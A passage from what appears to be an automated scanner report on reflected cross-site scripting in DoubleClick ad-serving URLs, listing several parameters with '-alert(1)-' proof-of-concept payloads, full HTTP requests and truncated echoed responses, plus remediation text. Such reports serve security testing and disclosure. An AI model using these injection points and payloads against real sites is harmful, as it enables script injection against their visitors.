<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fdhttp://content.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html?offer=ssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscript ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff78a"-alert(1)-"3582cf30a1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 16:03:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7521
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = u ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69442"-alert(1)-"07e6bcbb79d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "";
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c2d"-alert(1)-"a12e235cd32 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... YXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; v ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eedea"-alert(1)-"b4205954787 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 578f1"-alert(1)-"9cb53d4b6d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7527
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1db/%2a/j%3B235044966%3B1-0%3B0%3B58876509%3B3454-728/90%3B40290298/40308085/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1s ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f57'-alert(1)-'ca7e6a01360 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:04 GMT
Expires: Thu, 03 Feb 2011 16:06:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360https://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48315"-alert(1)-"6e66920d7bf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:59 GMT
Expires: Thu, 03 Feb 2011 16:05:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bfhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9569'-alert(1)-'6b525c8dbf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417c6"-alert(1)-"e33aa584cf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7b"-alert(1)-"f629491b606 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
